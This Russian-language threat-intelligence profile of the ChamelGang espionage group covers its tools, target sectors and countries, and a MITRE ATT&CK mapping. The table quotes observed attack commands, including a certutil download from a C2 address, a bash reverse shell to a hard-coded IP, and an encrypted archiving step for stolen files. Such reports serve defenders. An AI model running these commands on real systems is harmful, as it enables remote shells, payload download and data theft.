Содержание
Цели:
- Шпионаж
Общее описание
ChamelGang - APT-группировка, активная, как минимум, с 2019 года. Особенность группы - маскировка ВПО и сетевой инфраструктуры под легитимные сервисы Microsoft, TrendMicro, McAfee, IBM, Google и других компаний. В расследуемых нами кейсах группа проникала в сеть двумя способами: trusted relationship - группа скомпрометировала дочернюю организацию и через нее проникла в сеть целевого предприятия, и компрометация Exchange сервера с помощью цепочки уязвимостей ProxyShell. Еще одна особенность группы – использование пассивновного бэкбора DoorMe, который группа встраивала как модуль в скомпрометированный Exchange или в другой IIS сервер.
Инструменты
- DoorMe
- ProxyT
- BeaconLoader
- Cobalt Strike
- FRP
- Tiny Shell
- reGeorg
Атакуемые отрасли
- Авиационно-космическая промышленность
- Государственный сектор
- Телекоммуникации
- Финансовый сектор
- Энергетика
Атакуемые страны
- Афганистан
- Вьетнам
- Индия
- Литва
- Непал
- Россия
- США
- Тайвань
- Турция
- Япония
Отчеты Positive Technologies и других исследователей
Тактики из MITRE ATT&CK, использованные группой
| ID | Название | Описание |
|---|---|---|
| Resource Development | ||
| T1583.001 | Domains | Группа ChamelGang приобретала домены, которые имитировали легитимные. Примеры: newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com, centralgoogle.com |
| T1587.001 | Malware | Группа ChamelGang разработала собственное ВПО для совершения атаки. Примеры: бэкдор DoorMe, ProxyTest |
| T1588.002 | Tool | Группа ChamelGang использовала общедоступный инструмент Cobalt Strike, для работы с которым требуется платная лицензия. Примеры: Watermark – 1936770133 |
| T1588.004 | Digital Certificates | Группа ChamelGang размещала собственные SSL-сертификаты, которые имитировали легитимные. Примеры: github.com, www.ibm.com, jquery.com, update.microsoft-support.net |
| Initial Access | ||
| T1199 | Trusted Relationship | Группа ChamelGang проникла в целевую организацию через смежную инфраструктуру с дочерней организацией |
| T1190 | Exploit Public-Facing Application | Группа ChamelGang использовала общедоступный эксплойт для получения доступа к инфраструктуре, смежной с инфраструктурой атакуемой организации. Примеры: CVE-2017-12149, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 |
| Execution | ||
| T1047 | Windows Management Instrumentation | Группа ChamelGang использовала утилиту wmic для выполнения команд на узлах. Примеры: C:\Windows\system32\cmd.exe /C wmic /node:"host" process call create "c:\windows\system32\cmd.exe /c certutil -urlcache -f -split http://42.99.116[.]14/ c:\windows\temp\MpKsl15169faf > c:\windows\temp\_1622775917806 2>&1" |
| T1059.003 | Windows Command Shell | Группа ChamelGang использовала командный интерпретатор «cmd.exe /c» для выполнения команд на узлах. Примеры: cmd.exe /C copy hosts.bak c:\windows\system32\drivers\etc\hosts |
| Persistence | ||
| T1505.003 | Web Shell | Группа ChamelGang использовала различные веб-шеллы, а также нативный модуль IIS-сервера для управления зараженными узлами. Примеры: c:\windows\system32\inetsrv\appcmd.exe install module /name:FastCgiModule_en64bit /image:%windir%\System32\inetsrv\iisfcgix64.dll |
| T1574.001 | DLL Search Order Hijacking | Группа ChamelGang использовала соответствующую технику для исполнения полезной нагрузки. Примеры: oci.dll, wlbsctrl.dll |
| Privilege Escalation | ||
| T1068 | Exploitation for Privilege Escalation | Группа ChamelGang использовала эксплоиты для повышения привилегий на доступных узлах. Примеры: EternalBlue |
| Defense Evasion | ||
| T1036.003 | Masquerading: Rename System Utilities | Группа ChamelGang использовала вредоносные программы, которые копируют имена системных утилит, чтобы избежать обнаружения. Примеры: avp.exe, oci.dll, wlbsctrl.dll, modrpflt.dll, protsdown.dll |
| T1055 | Process Injection | Группа ChamelGang применяла вредоносные программы, которые используют внедрение вредоносной нагрузки в системные процессы |
| T1070 | Indicator Removal on Host | Группа ChamelGang удаляла образцы ВПО, чтобы избежать обнаружения |
| T1078.003 | Local Accounts | Группа ChamelGang использовала скомпрометированные локальные аккаунты администраторов для запуска ВПО с повышенными привилегиями для продвижения по скомпрометированной сети |
| T1140 | Deobfuscate/Decode Files or Information | Основная полезная нагрузка ВПО зашифрована алгоритмом AES |
| T1564.001 | Hide Artifacts: Hidden Files and Directories | Группа ChamelGang создавала скрытые файлы в Unix-подобных системах |
| T1070.006 | Indicator Removal on Host: Timestomp | Группа ChamelGang изменяла время создания ВПО и утилит в файловой системе, указывая более ранний период |
| Discovery | ||
| T1012 | Query Registry | Группа ChamelGang использовала утилиту reg для редактирования реестра Windows. Примеры: reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| T1016.001 | System Network Configuration Discovery: Internet Connection Discovery | Группа ChamelGang использовала утилиту curl для проверки интернет-соединения и связи с управляющими серверами. Примеры: curl -I -v https://*.*.*.* |
| T1018 | Remote System Discovery | Группа ChamelGang использовала утилиты nslookup, ping для проведения сетевой разведки. Примеры: nslookup -type=ns victim.local *.*.*.*, ping -a -n 1 *.*.*.* |
| T1049 | System Network Connections Discovery | Группа ChamelGang использовала утилиту netstat для проверки сетевых соединений. Примеры: c:\\windows\\system32\\cmd.exe /c netstat -anop tcp \u003e c:\\windows\\temp\\_1622169989165 |
| T1057 | Process Discovery | Группа ChamelGang использовала утилиту tasklist для получения информации о процессах |
| T1069.001 | Local Groups | Группа ChamelGang использовала утилиту net group для обнаружения пользователей |
| T1082 | System Information Discovery | Группа ChamelGang использовала утилиты ver, systeminfo для проведения разведки на узлах |
| T1087.001 | Local Account | Группа ChamelGang использовала утилиты net user, quser для обнаружения пользователей |
| Lateral Movement | ||
| T1210 | Exploitation of Remote Services | Группа ChamelGang эксплуатировала уязвимость MS17-010 (EternalBlue) для бокового перемещения на другие системы в скомпрометированной сети |
| Collection | ||
| T1560 | Archive Collected Data | Группа ChamelGang запускала консольную команду для создания архива файлов интересующих типов из пользовательских директорий на зараженных узлах. Примеры: 7z.exe a -padminadmin -mhe=on -mx9 his.7z hist*. |
| Command And Control | ||
| T1071 | Application Layer Protocol | Группа ChamelGang использовала HTTPS Cobalt Strike Beacon, а также версию с именованными каналами |
| T1090 | Proxy | Группа ChamelGang использовала прокси-серверы внутри сети. Примеры: FRP, bash -i >& /dev/tcp/115.144.122.8/5555 0>&1. |
| T1105 | Ingress Tool Transfer | Группа ChamelGang загружала дополнительные утилиты с управляющего сервера посредством утилиты certutil. Примеры: certutil -urlcache -f -split http://42.99.116[.]14/. |
| T1572 | Protocol Tunneling | Группа ChamelGang использовала инструменты туннелирования сетевого трафика. Примеры: Neo-reGeorg |
| Exfiltration | ||
| T1041 | Exfiltration Over C2 Channel | Группа ChamelGang выгружала украденные файлы на управляющие серверы |
